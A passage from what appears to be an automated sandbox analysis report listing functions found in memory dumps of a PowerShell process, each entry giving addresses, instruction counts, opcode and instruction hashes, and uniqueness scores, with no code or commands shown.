                                                            • Opcode Fuzzy Hash: 62ca61eb29ab0e2dbe7e9d9b3c812dcdf83a4e2eeab0655cebe9849568cd300d
                                                            • Instruction Fuzzy Hash: A071AE30A042098FDB14DF78C894AAEBBF6FF88314F148569E515DB761DB71AC46CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F7CDE Relevance: .2, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79869e04496b18196e99e773cfa02eea2915a156bcb7edbf09a57c7152fd3d99
                                                            • Instruction ID: 979590aa10179b2896cd341f0c16e3f5f8372b40d0d9c81b5d4a87cefaa0a0a9
                                                            • Opcode Fuzzy Hash: 79869e04496b18196e99e773cfa02eea2915a156bcb7edbf09a57c7152fd3d99
                                                            • Instruction Fuzzy Hash: 3C715D30A002189FDB14DFB5D884AADBBF6FF88304F148429D516EB7A0DB749D46CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FB1E7 Relevance: .1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 36f5f4f7fd6825bcaeabe38f755a30b122b04004046a866fcbea2e673f52d58e
                                                            • Instruction ID: 032eb1d76164c0f589bd63c3cdb33582662c7d0054998c314c89cf13a7a15307
                                                            • Opcode Fuzzy Hash: 36f5f4f7fd6825bcaeabe38f755a30b122b04004046a866fcbea2e673f52d58e
                                                            • Instruction Fuzzy Hash: 8051C774A00209EFDB05CFA8D594AADFBB2FF88314F248559E404AB365C771ED86CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F7B69 Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d89d42716263ed54c0a94bce67485742b8adf233eebce18dd9d016f623a22a8
                                                            • Instruction ID: 2b1f6ab6443d41d27949e1ffecc108ec05853932eea197e60c01937257f574dd
                                                            • Opcode Fuzzy Hash: 2d89d42716263ed54c0a94bce67485742b8adf233eebce18dd9d016f623a22a8
                                                            • Instruction Fuzzy Hash: 30414B30A002189FEB24DFA5C8546ADBBB6FF88310F148429D106AB765DB74AD45CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F790A Relevance: .1, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c91c6e08eb406978dcfdae1abe1bb9339742713a23f0422ef3a14660d150782
                                                            • Instruction ID: 661855df246f4c71976749dfb35a344bdcd949e9dcd1f1e6dc01010aede6a7c4
                                                            • Opcode Fuzzy Hash: 1c91c6e08eb406978dcfdae1abe1bb9339742713a23f0422ef3a14660d150782
                                                            • Instruction Fuzzy Hash: 28413A317042188FEB18DB34C958ABABBB6FF89710F158468E506EB3A4CB749C41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F7917 Relevance: .1, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d428572ac8fbf5abbfd374cb2407756be9ee864237439888eaed3218f66f7636
                                                            • Instruction ID: ee62481b21ebe49478b2292eeac2f9cc9e33d79e8d5083805b5955cb124197e8
                                                            • Opcode Fuzzy Hash: d428572ac8fbf5abbfd374cb2407756be9ee864237439888eaed3218f66f7636
                                                            • Instruction Fuzzy Hash: B8413C317042188FEB14DB34C954ABABBB6FF89710F158468E506EB3A4CF74AC41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F7B62 Relevance: .1, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ed61ed5bbee027decc8ec40183c636d327767dc93770d5495a634eccf75a269
                                                            • Instruction ID: 37d5b411ec1c98de3608d6d4382ec0ed60446d16d045fd3478a58a65163b707b
                                                            • Opcode Fuzzy Hash: 3ed61ed5bbee027decc8ec40183c636d327767dc93770d5495a634eccf75a269
                                                            • Instruction Fuzzy Hash: 03414B70A002188FEB24DFA9C8546ADBBB6FF88314F148429D106EB7A5DB74AD45CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07020998 Relevance: .1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3118c340a051d2a4cd8a8933129977608f1f0e31d53f0ef446dbe8b62bb487c7
                                                            • Instruction ID: 90d8068561ed99e786a4dd303a03c6984ca3529bbf890dcc6bf2c83eedbcf861
                                                            • Opcode Fuzzy Hash: 3118c340a051d2a4cd8a8933129977608f1f0e31d53f0ef446dbe8b62bb487c7
                                                            • Instruction Fuzzy Hash: 6831E8F2B003268FDBA5CF28C544B2DBBF2AB85708F5582A5D5149B311C731D946DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070260D8 Relevance: .1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1e8d557a2bb58458630b4aefb1bf895498476807e387e0355cb8e734b89cc18
                                                            • Instruction ID: 61483effe47b7242fc94db5946bdbc86a88788dbee55b0dbeaf91ea5dbd93280
                                                            • Opcode Fuzzy Hash: f1e8d557a2bb58458630b4aefb1bf895498476807e387e0355cb8e734b89cc18
                                                            • Instruction Fuzzy Hash: EB31E770B402249FD714A7A4C955FAF7AA3ABC4304F248418E9056F396CF76DD46CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070214C0 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 236275ac66323cb8eb88800f8d5aaeddde15f70a34f3c560b921db856893f2e5
                                                            • Instruction ID: 46d3f0e4ea6abb6cc5bc5952af510852a399a5aa2fa90f3652be879f6577291d
                                                            • Opcode Fuzzy Hash: 236275ac66323cb8eb88800f8d5aaeddde15f70a34f3c560b921db856893f2e5
                                                            • Instruction Fuzzy Hash: 30216EB270033DABC764577E8801B3BA6C69FC4711F24C92AA50ECB3C5DD76C94693A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FAED0 Relevance: .1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00e72803887e9af5ee1bf15032d1887c16997f8afa0610255c290af5a107d0cf
                                                            • Instruction ID: 5239030d1141ba057b563d78c4cd3c60ceaf5cd58e425c614bc4cc87fe2df2ba
                                                            • Opcode Fuzzy Hash: 00e72803887e9af5ee1bf15032d1887c16997f8afa0610255c290af5a107d0cf
                                                            • Instruction Fuzzy Hash: CD3118B4A0020A9FCB15CF59C5849AEFBF1FF48320B258699E518EB755C731EC51CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070214A8 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 36c9d6cd484b001da491142b18d7b04cdb9d8dd0770ff4c9aa43835c5a424a14
                                                            • Instruction ID: 6ec7eb3db0fc502f5d518d880bd76e89be06913fe14affb70bf829de08ac6c12
                                                            • Opcode Fuzzy Hash: 36c9d6cd484b001da491142b18d7b04cdb9d8dd0770ff4c9aa43835c5a424a14
                                                            • Instruction Fuzzy Hash: E721BEB27043696BD7200B7A8801B776FD55FC5700F148457E849CF2D2D97AC98A83B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FAE93 Relevance: .1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e34bb85eab225f653d50efd581e71486730feda5f4009ecae769dad16689b23
                                                            • Instruction ID: 6a825c573ae58400c108b7cb5a99f15831d41c5accaf92fc310c185c7d81a030
                                                            • Opcode Fuzzy Hash: 9e34bb85eab225f653d50efd581e71486730feda5f4009ecae769dad16689b23
                                                            • Instruction Fuzzy Hash: F72160B4A006099FCB19CF58C494AB9F7B1FF48320B258699D559DF765C736EC42CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07020BC8 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f03eba8a23b1296dcdd3106b660969b864f7b6ab489590f1561b423487ba822c
                                                            • Instruction ID: dcca09769541910d3bc69f28d971fba71bf76444aac866b84247c86d06f10b21
                                                            • Opcode Fuzzy Hash: f03eba8a23b1296dcdd3106b660969b864f7b6ab489590f1561b423487ba822c
                                                            • Instruction Fuzzy Hash: 8C11C8F77003159BC7658F05C480B7A7B979BC0751F68C125E8188F2A1C736DD46E7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070212B0 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64937f52394e5c7ec71b58c8719a07362d5eef303245dfe45bdd4a2e6c009c8c
                                                            • Instruction ID: 9067c151692adb2cba09fab1c18b771f6d1d22be7745ead60632e05d3b0bd8c8
                                                            • Opcode Fuzzy Hash: 64937f52394e5c7ec71b58c8719a07362d5eef303245dfe45bdd4a2e6c009c8c
                                                            • Instruction Fuzzy Hash: 2601477730022A8BC72456AAD40017BB7DADFC5262F14C43AE955CA600D632C85BD3A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FB2F4 Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01acbe9e3f6c3ed2a7dd379a2f04f9afce7187efa21db71f17b539281d32aae6
                                                            • Instruction ID: e0a333561052ef948c56f06ceacf7cc6f0f36da3b685007eab5e7290ab1bab4d
                                                            • Opcode Fuzzy Hash: 01acbe9e3f6c3ed2a7dd379a2f04f9afce7187efa21db71f17b539281d32aae6
                                                            • Instruction Fuzzy Hash: BB11C674A0020DAFDB05CBA8D884A9DBBB2FF48324F288159E405AB365C771A982CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006ED006 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2313576039.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfc8716cd4eba4add70b663920c8acabb521c0084a50ed998b70af7bc95c58bb
                                                            • Instruction ID: 1e0b66a954782a507e3c399485d12bf299dd951e9a7880062318f0ed529e1f44
                                                            • Opcode Fuzzy Hash: dfc8716cd4eba4add70b663920c8acabb521c0084a50ed998b70af7bc95c58bb
                                                            • Instruction Fuzzy Hash: 27011E6240E3C09ED7128B258D94B52BFB4EF53224F1DC5DBD9888F2A7C2699849C772
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006ED01D Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2313576039.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b2816d24266c9b09722c81f43054cf779f9a8986579dddc0a878934f52a6ba2
                                                            • Instruction ID: c813b6d4069aa14a8218c6f48f752d76043ba6ca330a2c95296587413a98c067
                                                            • Opcode Fuzzy Hash: 6b2816d24266c9b09722c81f43054cf779f9a8986579dddc0a878934f52a6ba2
                                                            • Instruction Fuzzy Hash: 1C01DB7140A3809AE7105F27CDC4BA7BFD9DF55324F1CC52AED584B286C679D882C6B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F2CB6 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4fae000ec94d0a4cc3bf95b882adc83941d61211c5a5163f80b256465c081734
                                                            • Instruction ID: 9c657ed819fc01df90c0c4fc2385bb43a2799165bf00613592848c4c8b876bd8
                                                            • Opcode Fuzzy Hash: 4fae000ec94d0a4cc3bf95b882adc83941d61211c5a5163f80b256465c081734
                                                            • Instruction Fuzzy Hash: 7EF0D435A001099FCB15CF9DD990AEEF7B1FF88324F208259E525A72A1C736AC52CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702274E Relevance: .0, Instructions: 3COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                                                            • Instruction ID: aa7568471c24b642ca0eef57f97030f7351818590365929177f3ff10fe4176df
                                                            • Opcode Fuzzy Hash: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                                                            • Instruction Fuzzy Hash:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 006ED6E0 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2313576039.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1270188afd12e136ce8832984abb1b06e9475473d42a192ad956cf788d355c75
                                                            • Instruction ID: ed17f6e4719e759a5a96bfcee4a5a7a1370bbb8aa831d495375607f6c3f3c7e0
                                                            • Opcode Fuzzy Hash: 1270188afd12e136ce8832984abb1b06e9475473d42a192ad956cf788d355c75
                                                            • Instruction Fuzzy Hash: D9210376505380DFCF05DF14DAC0B2ABF66FB94310F24C569D8094B356C336D856CAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702EF30 Relevance: 20.5, Strings: 16, Instructions: 461COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$TQcq$TQcq$TQcq$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-3025741253
                                                            • Opcode ID: 5f4d51bc058c32ec4fcd1789e6bd9b3e56060b54c7fd6083eb149e96aa9ffb65
                                                            • Instruction ID: 686029ec9b9df8609202ccea995949244eaddd9ea109c71866cd5bb5b046af37
                                                            • Opcode Fuzzy Hash: 5f4d51bc058c32ec4fcd1789e6bd9b3e56060b54c7fd6083eb149e96aa9ffb65
                                                            • Instruction Fuzzy Hash: FBF138B270022BDFCB148E64C904A6E7BF2BF85350F148669E8159B395CB71EC46DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702F820 Relevance: 18.0, Strings: 14, Instructions: 494COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$XRcq$XRcq$XRcq$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-2758755434
                                                            • Opcode ID: 71c0611e1559a19f1f64a1b2cdd2e3d96412ef0159177d1fa2b0d4767c430290
                                                            • Instruction ID: bfb2b6df870f1b46b126572a96982eb43ae5529571e570b79a28d949fc256182
                                                            • Opcode Fuzzy Hash: 71c0611e1559a19f1f64a1b2cdd2e3d96412ef0159177d1fa2b0d4767c430290
                                                            • Instruction Fuzzy Hash: AD023BB270022BDFCB149F65C50466EBBF2AF85390F248569E8019F395CB31EC42DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07027DF8 Relevance: 13.0, Strings: 10, Instructions: 458COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-788909730
                                                            • Opcode ID: 6bf51765e34761c03620c07afe669e9d302fa060b6b89fd226c956d99fb43c3e
                                                            • Instruction ID: 8de4701ee11efe8da12694cc864d7846884b2d5f4f3bfd5195809bcf03db306a
                                                            • Opcode Fuzzy Hash: 6bf51765e34761c03620c07afe669e9d302fa060b6b89fd226c956d99fb43c3e
                                                            • Instruction Fuzzy Hash: BBE16CB7B04326DFCB648A68881076ABBE6AFC5310F14C5AAD515CF3D1DB31C846D7A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07028408 Relevance: 10.3, Strings: 8, Instructions: 314COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-3865595929
                                                            • Opcode ID: 02f668dc16f666ebf18a0aed1f6862a2cfe5a9799f7dcee82a4f2a75b7620eb7
                                                            • Instruction ID: b901f107597ea37e984c4824a2565ee712bc1d721ba8d1025a0829b2881e08a5
                                                            • Opcode Fuzzy Hash: 02f668dc16f666ebf18a0aed1f6862a2cfe5a9799f7dcee82a4f2a75b7620eb7
                                                            • Instruction Fuzzy Hash: F5A17AB77043658FC7259A69880476BBFE1AFC6210F18C56BD549CF3D2DA32C846C7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702EF1C Relevance: 8.9, Strings: 7, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                            • API String ID: 0-2461640029
                                                            • Opcode ID: 3733932b7842a1c602fb8faa8c7a67d79b76ed062783cbebe0c528d624432f3d
                                                            • Instruction ID: 28bf6e30345ab5aa6b615ff40c9888af1681f24fa2f95d927ce075e7ac7f79db
                                                            • Opcode Fuzzy Hash: 3733932b7842a1c602fb8faa8c7a67d79b76ed062783cbebe0c528d624432f3d
                                                            • Instruction Fuzzy Hash: 095128B2700227DFDB648E14C5447AAB7F1BF41391F9483AAE8159B291C731EC87EB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702F80D Relevance: 6.4, Strings: 5, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                            • API String ID: 0-3997570045
                                                            • Opcode ID: 8af9d40c82469434c9c17accd2c00da10f2c5282eb1909950d32785734da68f4
                                                            • Instruction ID: fa1c69813143ec8e15a331f897fb4f74b81c4416fe70fa7e12fb957efce70f68
                                                            • Opcode Fuzzy Hash: 8af9d40c82469434c9c17accd2c00da10f2c5282eb1909950d32785734da68f4
                                                            • Instruction Fuzzy Hash: CA61F7F2A0022BDFDB648E14C54477A77F1AB45381F288656E8149F291CB31FD82DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702ED68 Relevance: 6.4, Strings: 5, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                            • API String ID: 0-3272787073
                                                            • Opcode ID: e0eb59208ff0710abc66835ac715cd60a50ddf8b09ee4fb1017dce24ee8ac12a
                                                            • Instruction ID: 25576b485f40d0a5d2cd8cddaf7a3b40833bb97d4910314d463558abfb9611f4
                                                            • Opcode Fuzzy Hash: e0eb59208ff0710abc66835ac715cd60a50ddf8b09ee4fb1017dce24ee8ac12a
                                                            • Instruction Fuzzy Hash: AA414BB3B8022ADFCF648E29C80C6AAB7E5AF85618F24857ED415CB244DB32C447D761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07020564 Relevance: 6.4, Strings: 5, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                            • API String ID: 0-3272787073
                                                            • Opcode ID: 693c2c6da45b3568c9971da8440d2d15321f6996d36ea72068eb4ca7d61c27a3
                                                            • Instruction ID: 10c77d37d7194ee147c74b3e43643f9f80cf32a4cac4ed2fb61979bef0a37500
                                                            • Opcode Fuzzy Hash: 693c2c6da45b3568c9971da8440d2d15321f6996d36ea72068eb4ca7d61c27a3
                                                            • Instruction Fuzzy Hash: 9D3159B3700336DFDB294A2088146BE7BE29FC1210F104A6BD8418F291DF32C987D7A6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702B068 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                            • API String ID: 0-3997570045
                                                            • Opcode ID: 4d3803952ad01e172fe5f2aba31391378582f287e014207aaebb6c711ee54aac
                                                            • Instruction ID: 59b17d256ed130e254fbae2d8dff211017b95e6331df795cd25ecada9e10a39b
                                                            • Opcode Fuzzy Hash: 4d3803952ad01e172fe5f2aba31391378582f287e014207aaebb6c711ee54aac
                                                            • Instruction Fuzzy Hash: F53106F3B00326DBDB648E45C580B79B7F2AB45320F44C665E8259F390EB31D846EB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702C81E Relevance: 5.4, Strings: 4, Instructions: 419COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
